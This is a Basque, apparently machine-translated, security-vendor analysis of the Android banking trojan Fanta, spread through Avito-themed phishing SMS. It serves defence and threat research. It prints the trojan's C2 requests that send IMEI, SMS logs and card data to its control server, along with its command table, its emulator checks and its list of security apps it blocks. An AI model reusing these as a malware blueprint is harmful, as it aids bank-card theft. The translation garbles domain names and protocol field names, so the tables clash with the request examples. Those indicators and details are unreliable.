Egunen batean Avito-n zerbait saldu nahi duzu eta, zure produktuaren deskribapen zehatza argitaratu ondoren (adibidez, RAM modulu bat), mezu hau jasoko duzu:
Esteka ireki ondoren, itxuraz inozoa den orri bat ikusiko duzu, zuri, zoriontsu eta arrakastatsua den saltzaileari, erosketa bat egin dela jakinarazten dizuna:
"Jarraitu" botoian klik egiten duzunean, ikono bat eta konfiantzazko izena duen APK fitxategi bat deskargatuko da zure Android gailura. Arrazoiren batengatik AccessibilityService eskubideak eskatzen zituen aplikazio bat instalatu zenuen, orduan pare bat leiho agertu ziren eta azkar desagertu ziren eta... Hori da.
Zure saldoa egiaztatzera joaten zara, baina arrazoiren batengatik zure banku-aplikazioak zure txartelaren datuak berriro eskatzen ditu. Datuak sartu ondoren, zerbait izugarria gertatzen da: oraindik argi ez duzun arrazoiren batengatik, dirua zure kontutik desagertzen hasten da. Arazoa konpontzen saiatzen ari zara, baina telefonoak aurre egiten dio: "Atzera" eta "Hasierako" teklak sakatzen ditu, ez du itzaltzen eta ez dizu segurtasun neurririk aktibatzen uzten. Ondorioz, dirurik gabe geratzen zara, zure ondasunak ez dira erosi, nahastuta zaude eta galdetzen duzu: zer gertatu zen?
Erantzuna erraza da: Android Troiako Fanta-en biktima bihurtu zara, Flexnet familiako kidea. Nola gertatu da hau? Azal dezagun orain.
Egileak: Andrey Polovinkin, malware analisian espezialista junior, Ivan Pisarev, malwarearen analisian espezialista.
Estatistika batzuk
Android Troiako Flexnet familia 2015ean ezagutu zen lehen aldiz. Jarduera nahiko luzean, familia hainbat azpiespezietara zabaldu zen: Fanta, Limebot, Lipton, etab. Troiakoa, baita hari lotutako azpiegiturak ere, ez daude geldirik: banaketa-eskema eraginkor berriak garatzen ari dira - gure kasuan, erabiltzaile-saltzaile jakin bati zuzendutako kalitate handiko phishing-orriak, eta troiako garatzaileek modako joerak jarraitzen dituzte. birusen idazketa - kutsatutako gailuetatik dirua modu eraginkorragoan lapurtzea eta babes-mekanismoak saihestea posible egiten duten funtzionalitate berriak gehitzea.
Artikulu honetan deskribatzen den kanpaina Errusiako erabiltzaileei zuzenduta dago; kutsatutako gailu kopuru txiki bat erregistratu zen Ukrainan, eta are gutxiago Kazakhstanen eta Bielorrusian.
Flexnet-ek 4 urte baino gehiago daramatza Android Troiako eremuan eta ikertzaile askok zehatz-mehatz aztertu duten arren, oraindik egoera onean dago. 2019ko urtarriletik aurrera, kalte potentziala 35 milioi errublo baino gehiagokoa da, eta hori Errusiako kanpainetarako bakarrik da. 2015ean, Android Troiako honen hainbat bertsio saldu ziren lurpeko foroetan, non troiakoaren iturburu-kodea deskribapen zehatzarekin ere aurki zitekeen. Horrek esan nahi du munduko kalteen estatistikak are ikusgarriagoak direla. Ez da adierazle txarra halako agure batentzat, ezta?
Salmentatik iruzurra
Aurretik aurkeztutako Avito iragarkiak argitaratzeko Interneteko zerbitzurako phishing orri baten pantaila-argazkian ikus daitekeenez, biktima zehatz baterako prestatu zen. Antza denez, erasotzaileek Avitoren analizatzaileetako bat erabiltzen dute, eta saltzailearen telefono zenbakia eta izena ateratzen ditu, baita produktuaren deskribapena ere. Orria zabaldu eta APK fitxategia prestatu ondoren, biktimari SMS bat bidaltzen zaio bere izenarekin eta phishing-orri baterako esteka batekin, bere produktuaren deskribapena eta produktuaren “salmentatik” jasotako zenbatekoarekin. Botoian klik eginez gero, erabiltzaileak APK fitxategi maltzur bat jasoko du - Fanta.
shcet491[.]ru domeinuaren azterketak erakutsi zuen Hostinger-en DNS zerbitzarietan delegatuta dagoela:
- ns1.hostinger.ru
- ns2.hostinger.ru
- ns3.hostinger.ru
- ns4.hostinger.ru
Domeinu eremuko fitxategiak 31.220.23[.]236, 31.220.23[.]243 eta 31.220.23[.]235 IP helbideak seinalatzen dituzten sarrerak ditu. Hala ere, domeinuaren lehen baliabideen erregistroak (A erregistroa) 178.132.1[.]240 IP helbidea duen zerbitzari batera seinalatzen du.
178.132.1[.]240 IP helbidea Herbehereetan dago eta ostalariarena da WorldStream. 31.220.23[.]235, 31.220.23[.]236 eta 31.220.23[.]243 IP helbideak Erresuma Batuan daude eta HOSTINGER ostalaritza partekatuaren zerbitzariarenak dira. Grabagailu gisa erabiltzen da openprov-ru. Domeinu hauek ere 178.132.1[.]240 IP helbidera ebatzi dira:
- sdelka-ru[.]ru
- tovar-av[.]ru
- av-tovar[.]ru
- ru-sdelka[.]ru
- shcet382[.]ru
- sdelka221[.]ru
- sdelka211[.]ru
- vyplata437[.]ru
- viplata291[.]ru
- perevod273[.]ru
- perevod901[.]ru
Kontuan izan behar da formatu honetako estekak ia domeinu guztietatik eskuragarri zeudela:
http://(www.){0,1}<%domain%>/[0-9]{7}
Txantiloi honek SMS mezu baten esteka ere badu. Datu historikoetan oinarrituta, aurkitu da domeinu bat goian deskribatutako ereduan hainbat esteka dagokiela, eta horrek adierazten du domeinu bat erabili zela Troiako hainbat biktimari banatzeko.
Goazen pixka bat aurrera: SMS batetik esteka baten bidez deskargatutako troiarrak helbidea erabiltzen du kontrol zerbitzari gisa onusedseddohap[.]kluba. Domeinu hau 2019-03-12an erregistratu zen eta 2019-04-29tik aurrera, APK aplikazioek domeinu honekin elkarreragin zuten. VirusTotal-en lortutako datuetan oinarrituta, guztira 109 aplikaziok zerbitzari honekin elkarreragin zuten. Domeinua bera IP helbidera ebatzi da 217.23.14[.]27, Herbehereetan kokatua eta ostalariarena WorldStream. Grabagailu gisa erabiltzen da NameCheap. Domeinuak ere IP helbide honetara ebatzi dira bad-racoon[.]kluba (2018-09-25etik aurrera) eta bad-racoon[.]bizi (2018-10-25etik aurrera). Domeinuarekin bad-racoon[.]kluba 80 APK fitxategi baino gehiagorekin elkarreraginean bad-racoon[.]bizi - 100 baino gehiago.
Oro har, erasoak honela egiten du aurrera:
Zer dago Fantaren estalkiaren azpian?
Android beste troiako asko bezala, Fanta gai da SMS mezuak irakurtzeko eta bidaltzeko, USSD eskaerak egiteko eta aplikazioen gainean (bankuetakoak barne) bere leihoak bistaratzeko. Hala ere, familia honen funtzionaltasun armategia iritsi da: Fanta erabiltzen hasi zen Irisgarritasun Zerbitzua hainbat helbururekin: beste aplikazio batzuetako jakinarazpenen edukia irakurtzea, detektatzea eragotzi eta infektatutako gailu batean troiako baten exekuzioa geldiaraztea, etab. Fanta 4.4 baino gazteago ez den Android-en bertsio guztietan funtzionatzen du. Artikulu honetan Fanta lagin hau gertuagotik aztertuko dugu:
- MD5: 0826bd11b2c130c4c8ac137e395ac2d4
- SHA1: ac33d38d486ee4859aa21b9aeba5e6e11404bcc8
- SHA256: df57b7e7ac6913ea5f4daad319e02db1f4a6b243f2ea6500f83060648da6edfb
Abian jarri eta berehala
Abiarazi eta berehala, Troiakoak bere ikonoa ezkutatzen du. Aplikazioak bakarrik funtziona dezake kutsatutako gailuaren izena zerrendan ez badago:
- android_x86
- VirtualBox
- Nexus 5X (burua)
- Nexus 5 (bizarra)
Egiaztapen hau Troiako zerbitzu nagusian egiten da - Zerbitzu Nagusia. Lehen aldiz abiarazten denean, aplikazioaren konfigurazio-parametroak balio lehenetsiekin hasieratzen dira (konfigurazio-datuak gordetzeko formatua eta haien esanahia geroago eztabaidatuko dira), eta kutsatutako gailu berri bat erregistratzen da kontrol-zerbitzarian. Mezu mota duen HTTP POST eskaera bat bidaliko da zerbitzariari erregistratu_bot eta kutsatutako gailuari buruzko informazioa (Android bertsioa, IMEI, telefono-zenbakia, operadorearen izena eta operadorea erregistratuta dagoen herrialde-kodea). Helbidea kontrol zerbitzari gisa balio du hXXp://onuseseddohap[.]club/controller.php. Erantzun gisa, zerbitzariak eremuak dituen mezu bat bidaltzen du bot_id, bot_pwd, zerbitzaria — Aplikazioak balio hauek CnC zerbitzariaren parametro gisa gordetzen ditu. Parametroa zerbitzaria aukerakoa eremua jaso ez bada: Fanta-ek erregistro helbidea erabiltzen du - hXXp://onuseseddohap[.]club/controller.php. CnC helbidea aldatzeko funtzioa bi arazo konpontzeko erabil daiteke: karga uniformeki banatzeko hainbat zerbitzarien artean (kutsatutako gailu kopuru handia baldin badago, optimizatu gabeko web zerbitzari batean karga handia izan daiteke), eta baita erabiltzeko ere. ordezko zerbitzari bat CnC zerbitzariren baten hutsegitearen kasuan.
Eskaera bidaltzean erroreren bat gertatzen bada, troiarrak erregistro-prozesua errepikatuko du 20 segundoren buruan.
Gailua behar bezala erregistratu ondoren, Fantak honako mezu hau erakutsiko dio erabiltzaileari:
Ohar garrantzitsua: zerbitzua deitu Sistemaren segurtasuna — Troiako zerbitzuaren izena, eta botoia sakatu ondoren OK Leiho bat irekiko da kutsatutako gailuaren Erabilerraztasun-ezarpenekin, non erabiltzaileak zerbitzu maltzurren Irisgarritasun-eskubideak eman behar dituen:
Erabiltzailea piztu bezain laster Irisgarritasun Zerbitzua, Fanta-ek aplikazioen leihoetako edukietara eta horietan egiten diren ekintzetara sarbidea lortzen du:
Irisgarritasun-eskubideak jaso eta berehala, Troiakoak administratzaile-eskubideak eta jakinarazpenak irakurtzeko eskubideak eskatzen ditu:
Irisgarritasun Zerbitzua erabiliz, aplikazioak tekla sakatzeak simulatzen ditu, eta horrela beharrezko eskubide guztiak ematen dizkio.
Fanta-ek hainbat datu-base-instantzia sortzen ditu (gero deskribatuko direnak) beharrezkoak diren konfigurazio-datuak gordetzeko, baita infektatutako gailuari buruzko prozesuan bildutako informazioa ere. Bildutako informazioa bidaltzeko, troiarrak datu-basetik eremuak deskargatzeko eta kontrol zerbitzariaren komando bat jasotzeko diseinatutako zeregin errepikakorra sortzen du. CnCra sartzeko tartea Android bertsioaren arabera ezartzen da: 5.1-en kasuan, tartea 10 segundokoa izango da, bestela 60 segundokoa.
Agindua jasotzeko, Fantak eskaera bat egiten du GetTask kudeaketa zerbitzariari. Erantzun gisa, CnC-k komando hauetako bat bidal dezake:
| Team | Description |
|---|---|
| 0 | Bidali SMS mezua |
| 1 | Egin telefono-dei bat edo USSD komando bat |
| 2 | Parametro bat eguneratzen du tarte |
| 3 | Parametro bat eguneratzen du atzematen |
| 6 | Parametro bat eguneratzen du smsManager |
| 9 | Hasi SMS mezuak biltzen |
| 11 | Berrezarri telefonoa fabrikako ezarpenetara |
| 12 | Gaitu/Desgaitu elkarrizketa-koadroaren sorreraren erregistroa |
Fantas-k 70 banku-aplikazio, ordainketa-sistema azkar eta zorro elektronikoen jakinarazpenak ere biltzen ditu eta datu-base batean gordetzen ditu.
Konfigurazio-parametroak gordetzea
Konfigurazio-parametroak gordetzeko, Fanta-ek ikuspegi estandar bat erabiltzen du Android plataformarako - Hobespenak-fitxategiak. Ezarpenak izeneko fitxategi batean gordeko dira ezarpenak. Gordetako parametroen deskribapena beheko taulan dago.
| izen | Balio lehenetsia | Balio posibleak | Description |
|---|---|---|---|
| id | 0 | Osokoa | Bot ID |
| zerbitzaria | hXXp://onuseseddohap[.]club/ | URL | Kontrol zerbitzariaren helbidea |
| pwd | - | String | Zerbitzariaren pasahitza |
| tarte | 20 | Osokoa | Denbora tartea. Honako zeregin hauek zenbat denboran atzeratu behar diren adierazten du:
|
| atzematen | guztiak | guztiak/telZenbakia | Eremua katearen berdina bada guztiak edo telZenbakia, orduan jasotako SMS mezua aplikazioak atzemango du eta ez zaio erabiltzaileari erakutsiko |
| smsManager | 0 | 0/1 | Gaitu/desgaitu aplikazioa SMS hartzaile lehenetsi gisa |
| irakurri elkarrizketa | false | Egia gezurra | Gaitu/Desgaitu gertaeren erregistroa IrisgarritasunEkitaldia |
Fantak fitxategia ere erabiltzen du smsManager:
| izen | Balio lehenetsia | Balio posibleak | Description |
|---|---|---|---|
| pckg | - | String | Erabilitako SMS mezu-kudeatzailearen izena |
Datu-baseekin elkarreragina
Funtzionamenduan zehar, troiarrak bi datu-base erabiltzen ditu. Datu-basea izendatua a telefonotik jasotako hainbat informazio gordetzeko erabiltzen da. Bigarren datu-baseari izena ematen zaio fantasia.db eta banku-txartelei buruzko informazioa biltzeko diseinatutako phishing-leihoak sortzeaz arduratzen diren ezarpenak gordetzeko erabiltzen da.
Troiako datu-basea erabiltzen du а bildutako informazioa gordetzeko eta zure ekintzak erregistratzeko. Datuak taula batean gordetzen dira erregistroak. Taula bat sortzeko, erabili SQL kontsulta hau:
create table logs ( _id integer primary key autoincrement, d TEXT, f TEXT, p TEXT, m integer)Datu-baseak informazio hau dauka:
1. Kutsatutako gailuaren abiaraztearen erregistroa mezu batekin Telefonoa piztuta!
2. Aplikazioen jakinarazpenak. Mezua ondorengo txantiloiaren arabera sortzen da:
(<%App Name%>)<%Title%>: <%Notification text%>
3. Troiarrak sortutako phishing inprimakietako banku-txartelen datuak. Parametroa VIEW_NAME honako hauetako bat izan daiteke:
- AliExpress
- Avito
- Google Play
- Askotariko <%App Name%>
Mezua formatuan erregistratuta dago:
[<%Time in format HH:mm:ss dd.MM.yyyy%>](<%VIEW_NAME%>) Номер карты:<%CARD_NUMBER%>; Дата:<%MONTH%>/<%YEAR%>; CVV: <%CVV%>
4. Sarrerako/irteerako SMS mezuak formatuan:
([<%Time in format HH:mm:ss dd.MM.yyyy%>] Тип: Входящее/Исходящее) <%Mobile number%>:<%SMS-text%>
5. Elkarrizketa-koadroa sortzen duen paketeari buruzko informazioa formatuan:
(<%Package name%>)<%Package information%>
Taula adibidea erregistroak:
Fanta-en funtzionalitateetako bat banku-txartelei buruzko informazioa biltzea da. Datu bilketa banku-aplikazioak irekitzean phishing leihoak sortzearen bidez gertatzen da. Troiarrak behin bakarrik sortzen du phishing leihoa. Erabiltzaileari leihoa erakutsi zaion informazioa taula batean gordetzen da ezarpenak datu-basean fantasia.db. Datu-base bat sortzeko, erabili SQL kontsulta hau:
create table settings (can_login integer, first_bank integer, can_alpha integer, can_avito integer, can_ali integer, can_vtb24 integer, can_telecard integer, can_another integer, can_card integer);Taularen eremu guztiak ezarpenak lehenespenez 1 gisa hasieratuta (sortu phishing-leiho bat). Erabiltzaileak bere datuak sartu ondoren, balioa 0 izango da. Taula-eremuen adibidea ezarpenak:
- saioa hasi daiteke — eremua arduratzen da inprimakia bistaratzeaz banku-eskaera bat irekitzean
- lehen_bankua - ez da erabiltzen
- can_avito — eremua da Avito aplikazioa irekitzean inprimakia bistaratzeaz arduratzen dena
- can_ali — eremua inprimakia bistaratzeaz arduratzen da Aliexpress aplikazioa irekitzean
- can_beste — eremua da inprimakia bistaratzeaz zerrendako edozein eskaera irekitzean: Yula, Pandao, Drom Auto, Wallet. Deskontu eta bonus txartelak, Aviasales, Booking, Trivago
- can_card — eremua irekitzean inprimakia bistaratzeaz arduratzen da Google Play
Kudeaketa zerbitzariarekin interakzioa
Sareko interakzioa kudeaketa zerbitzariarekin HTTP protokoloaren bidez gertatzen da. Sarearekin lan egiteko, Fantak Retrofit liburutegi ezaguna erabiltzen du. Eskaerak helbide honetara bidaltzen dira: hXXp://onuseseddohap[.]club/controller.php. Zerbitzariaren helbidea alda daiteke zerbitzarian erregistratzean. Cookieak zerbitzaritik erantzunez bidal daitezke. Fantak honako eskaera hauek egiten dizkio zerbitzariari:
- Bot-aren erregistroa kontrol-zerbitzarian behin egiten da, lehenengo abiaraztean. Kutsatutako gailuari buruzko datu hauek zerbitzarira bidaltzen dira:
· Cookie — zerbitzaritik jasotako cookieak (balio lehenetsia kate hutsa da)
· modua — kate konstantea erregistratu_bot
· aurrizkia - konstante osokoa 2
· bertsioa_sdk — Ondorengo txantiloiaren arabera eratzen da: <%Build.MODEL%>/<%Build.VERSION.RELEASE%>(Avit)
· IMEI — Kutsatutako gailuaren IMEI
· herrialde — operadorea erregistratuta dagoen herrialdeko kodea, ISO formatuan
· zenbakia - telefono zenbakia
· operadorea - operadorearen izenaZerbitzariari bidalitako eskaera baten adibidea:
POST /controller.php HTTP/1.1 Cookie: Content-Type: application/x-www-form-urlencoded Content-Length: 144 Host: onuseseddohap.club Connection: close Accept-Encoding: gzip, deflate User-Agent: okhttp/3.6.0 mode=register_bot&prefix=2&version_sdk=<%VERSION_SDK%>&imei=<%IMEI%>&country=<%COUNTRY_ISO%>&number=<%TEL_NUMBER%>&operator=<%OPERATOR_NAME%>Eskaerari erantzunez, zerbitzariak parametro hauek dituen JSON objektu bat itzuli behar du:
· bot_id — Kutsatutako gailuaren IDa. bot_id 0-ren berdina bada, Fanta-k eskaera berriro exekutatu egingo du.
bot_pwd — zerbitzariaren pasahitza.
zerbitzaria — kontrolatu zerbitzariaren helbidea. Aukerako parametroa. Parametroa zehazten ez bada, aplikazioan gordetako helbidea erabiliko da.JSON objektuaren adibidea:
{ "response":[ { "bot_id": <%BOT_ID%>, "bot_pwd": <%BOT_PWD%>, "server": <%SERVER%> } ], "status":"ok" }
- Zerbitzaritik komando bat jasotzeko eskaera. Datu hauek zerbitzarira bidaltzen dira:
· Cookie — zerbitzaritik jasotako cookieak
· eskaintza — Eskaera bidaltzean jaso zen kutsatutako gailuaren id erregistratu_bot
· pwd — zerbitzariaren pasahitza
· dibide_admin — eremuak administratzaile-eskubideak lortu ote diren zehazten du. Administratzaile eskubideak lortu badira, eremua berdina da 1, bestela 0
· Erabilerraztasuna — Irisgarritasun Zerbitzuaren funtzionamendu-egoera. Zerbitzua hasi bazen, balioa da 1, bestela 0
· SMS Manager — Troiako SMSak jasotzeko aplikazio lehenetsi gisa gaituta dagoen erakusten du
· pantaila — pantaila zein egoeratan dagoen bistaratzen du. Balioa ezarriko da 1, pantaila piztuta badago, bestela 0;Zerbitzariari bidalitako eskaera baten adibidea:
POST /controller.php HTTP/1.1 Cookie: Content-Type: application/x-www-form-urlencoded Host: onuseseddohap.club Connection: close Accept-Encoding: gzip, deflate User-Agent: okhttp/3.6.0 mode=getTask&bid=<%BID%>&pwd=<%PWD%>&divice_admin=<%DEV_ADM%>&Accessibility=<%ACCSBL%>&SMSManager=<%SMSMNG%>&screen=<%SCRN%>Komandoaren arabera, zerbitzariak JSON objektu bat itzul dezake parametro ezberdinekin:
· Team Bidali SMS mezua: Parametroek telefono zenbakia, SMS mezuaren testua eta bidaltzen ari den mezuaren IDa dituzte. Identifikatzailea zerbitzariari mezu bat bidaltzean erabiltzen da ezarriSmsStatus.
{ "response": [ { "mode": 0, "sms_number": <%SMS_NUMBER%>, "sms_text": <%SMS_TEXT%>, "sms_id": %SMS_ID% } ], "status":"ok" }· Team Egin telefono-dei bat edo USSD komando bat: Telefono-zenbakia edo komandoa erantzunaren gorputzean dator.
{ "response": [ { "mode": 1, "command": <%TEL_NUMBER%> } ], "status":"ok" }· Team Aldatu tartearen parametroa.
{ "response": [ { "mode": 2, "interval": <%SECONDS%> } ], "status":"ok" }· Team Aldatu intercept parametroa.
{ "response": [ { "mode": 3, "intercept": "all"/"telNumber"/<%ANY_STRING%> } ], "status":"ok" }· Team Aldatu SmsManager eremua.
{ "response": [ { "mode": 6, "enable": 0/1 } ], "status":"ok" }· Team Bildu SMS mezuak kutsatutako gailu batetik.
{ "response": [ { "mode": 9 } ], "status":"ok" }· Team Berrezarri telefonoa fabrikako ezarpenetara:
{ "response": [ { "mode": 11 } ], "status":"ok" }· Team Aldatu ReadDialog parametroa.
{ "response": [ { "mode": 12, "enable": 0/1 } ], "status":"ok" }
- Motarekin mezu bat bidaltzea ezarriSmsStatus. Eskaera hau komandoa exekutatu ondoren egiten da Bidali SMS mezua. Eskaerak honela dauka:
POST /controller.php HTTP/1.1
Cookie:
Content-Type: application/x-www-form-urlencoded
Host: onuseseddohap.club
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: okhttp/3.6.0
mode=setSmsStatus&id=<%ID%>&status_sms=<%PWD%>- Datu-basearen edukia kargatzea. Eskaera bakoitzeko errenkada bat transmititzen da. Datu hauek zerbitzarira bidaltzen dira:
· Cookie — zerbitzaritik jasotako cookieak
· modua — kate konstantea ezarriSaveInboxSms
· eskaintza — Eskaera bidaltzean jaso zen kutsatutako gailuaren id erregistratu_bot
· testu — uneko datu-baseko erregistroko testua (eremua d mahaitik erregistroak datu-basean а)
· zenbakia — uneko datu-baseko erregistroaren izena (eremua p mahaitik erregistroak datu-basean а)
· sms_modea - balio osokoa (eremua m mahaitik erregistroak datu-basean а)Eskaerak honela dauka:
POST /controller.php HTTP/1.1 Cookie: Content-Type: application/x-www-form-urlencoded Host: onuseseddohap.club Connection: close Accept-Encoding: gzip, deflate User-Agent: okhttp/3.6.0 mode=setSaveInboxSms&bid=<%APP_ID%>&text=<%a.logs.d%>&number=<%a.logs.p%>&sms_mode=<%a.logs.m%>Zerbitzarira ongi bidaliz gero, errenkada taulatik ezabatuko da. Zerbitzariak itzultzen duen JSON objektu baten adibidea:
{ "response":[], "status":"ok" }
Irisgarritasun Zerbitzuarekin interakzioan
AccessibilityService inplementatu zen desgaitasuna duten pertsonei Android gailuak errazago erabiltzeko. Kasu gehienetan, interakzio fisikoa behar da aplikazio batekin elkarreragiteko. AccessibilityService-k programatikoki egiteko aukera ematen dizu. Fantak zerbitzua erabiltzen du banku-aplikazioetan leiho faltsuak sortzeko eta erabiltzaileei sistemaren ezarpenak eta aplikazio batzuk irekitzea eragozteko.
AccessibilityService-ren funtzionaltasuna erabiliz, Troiakoak kutsatutako gailuaren pantailako elementuen aldaketak kontrolatzen ditu. Aurretik deskribatu bezala, Fanta ezarpenek elkarrizketa-koadroekin saioa erregistratzeko eragiketen ardura duen parametro bat dute - irakurri elkarrizketa. Parametro hau ezartzen bada, gertaera abiarazi duen paketearen izenari eta deskribapenari buruzko informazioa gehituko da datu-basean. Troiakoak ekintza hauek egiten ditu gertaerak abiarazten direnean:
- Atzeko eta hasierako teklak sakatzea simulatzen du kasu hauetan:
· erabiltzaileak bere gailua berrabiarazi nahi badu
· erabiltzaileak “Avito” aplikazioa ezabatu nahi badu edo sarbide-eskubideak aldatu nahi baditu
· orrialdean “Avito” aplikazioaren aipamena badago
· Google Play Protect aplikazioa irekitzean
· AccessibilityService ezarpenak dituzten orriak irekitzean
· Sistemaren segurtasuna elkarrizketa-koadroa agertzen denean
· "Marraztu beste aplikazio baten gainean" ezarpenekin orria irekitzean
· "Aplikazioak" orria irekitzean, "Berreskuratu eta berrezarri", "Datuak berrezarri", "Ezarpenak berrezarri", "Garatzaileen panela", "Berezia. aukerak", "Aukera bereziak", "Eskubide bereziak"
· gertaera aplikazio jakin batzuek sortu badute.Aplikazioen zerrenda
- androide
- Master Lite
- Clean Master
- Clean Master x86 CPUrako
- Meizu aplikazioaren baimenen kudeaketa
- MIUI segurtasuna
- Clean Master - Birusen aurkako eta cachea eta zabor garbitzailea
- Gurasoen kontrolak eta GPSa: Kaspersky SafeKids
- Kaspersky Antivirus AppLock eta Web Security Beta
- Birusen garbitzailea, birusen aurkakoa, garbitzailea (MAX Security)
- Mobile AntiVirus Security PRO
- Avast antibirus eta doako babesa 2019
- Segurtasun mugikorra MegaFon
- AVG babesa Xperiarako
- Segurtasun mugikorra
- Malwarebytes birusen aurkako eta babesa
- Android 2019rako birusen aurkakoa
- Security Master - Birusen aurkakoa, VPN, AppLock, Booster
- AVG antibirusa Huawei tablet sistema kudeatzailea
- Samsung Erabilerraztasuna
- Samsung Smart Manager
- Segurtasun Masterra
- Speed Booster
- dr.web
- Dr.Web Segurtasun Espazioa
- Dr.Web Mugikorreko Kontrol Zentroa
- Dr.Web Security Space Life
- Dr.Web Mugikorreko Kontrol Zentroa
- Birusen aurkako eta segurtasun mugikorra
- Kaspersky Internet Security: birusen aurkako eta babesa
- Kaspersky bateriaren iraupena: aurrezlea eta indartzailea
- Kaspersky Endpoint Security - babesa eta kudeaketa
- AVG Antivirus free 2019 - Androiderako babesa
- Antivirus Android
- Norton Mobile Security eta birusen aurkakoa
- Birusen aurkakoa, suebakia, VPN, segurtasun mugikorra
- Segurtasun mugikorra: birusen aurkakoa, VPN, lapurreta babesa
- Antibirusa Androiderako
- Zenbaki labur batera SMS mezu bat bidaltzean baimena eskatzen bada, Fanta-ek kontrol-laukian klik egitea simulatzen du Gogoratu aukeraketa eta botoia bidali behar.
- Troiako administratzaile-eskubideak kentzen saiatzen zarenean, telefonoaren pantaila blokeatzen du.
- Administratzaile berriak gehitzea eragozten du.
- Birusen aurkako aplikazioa bada dr.web mehatxu bat detektatu zuen, Fantak botoia sakatzea imitatzen du alde batera utzi.
- Troiarrak atzeko eta hasierako botoia sakatzea simulatzen du, gertaera aplikazioak sortu badu Samsung gailuen zaintza.
- Fanta-ek phishing-leihoak sortzen ditu banku-txartelei buruzko informazioa sartzeko inprimakiekin, Interneteko 30 bat zerbitzuren zerrendako aplikazio bat abiarazi bada. Horien artean: AliExpress, Booking, Avito, Google Play Market Component, Pandao, Drom Auto, etab.
Phishing inprimakiak
Fantak infektatutako gailuan zein aplikazio exekutatzen ari diren aztertzen du. Intereseko aplikazio bat ireki bazen, troiarrak phishing-leiho bat erakusten du beste guztien gainean, hau da, banku-txartelen informazioa sartzeko formularioa. Erabiltzaileak datu hauek sartu behar ditu:
- Txartel zenbakia
- Txartela iraungitze-data
- CVV
- Txartelaren izena (ez da banku guztietarako)
Exekutatzen ari den aplikazioaren arabera, phishing-leiho desberdinak erakutsiko dira. Jarraian, horietako batzuen adibideak dituzu:
AliExpress:
Avito:
Beste aplikazio batzuetarako, adibidez. Google Play Market, Aviasales, Pandao, Booking, Trivago:
Nola izan zen benetan
Zorionez, artikuluaren hasieran deskribatutako SMS mezua jaso zuen pertsona zibersegurtasun espezialista bat izan zen. Hori dela eta, benetako bertsioa, zuzendaria ez dena, lehen esandakoaren aldean desberdina da: pertsona batek SMS interesgarri bat jaso zuen, eta ondoren Group-IB Threat Hunting Intelligence taldeari eman zion. Erasoaren emaitza artikulu hau da. Amaiera zoriontsua, ezta? Hala ere, istorio guztiak ez dira hain arrakastatsu amaitzen, eta zurea dirua galtzearekin zuzendari baten ebakia izan ez dadin, kasu gehienetan nahikoa da luze deskribatutako arau hauek betetzea:
- ez instalatu Android OSa duen gailu mugikor baterako aplikaziorik Google Play ez den iturrietatik
- Aplikazio bat instalatzean, arreta berezia jarri aplikazioak eskatzen dituen eskubideei
- arreta jarri deskargatutako fitxategien luzapenei
- instalatu Android OS eguneraketak aldizka
- ez bisitatu baliabide susmagarriak eta ez deskargatu hortik fitxategiak
- Ez egin klik SMS mezuetan jasotako esteketan.
Iturria: www.habr.com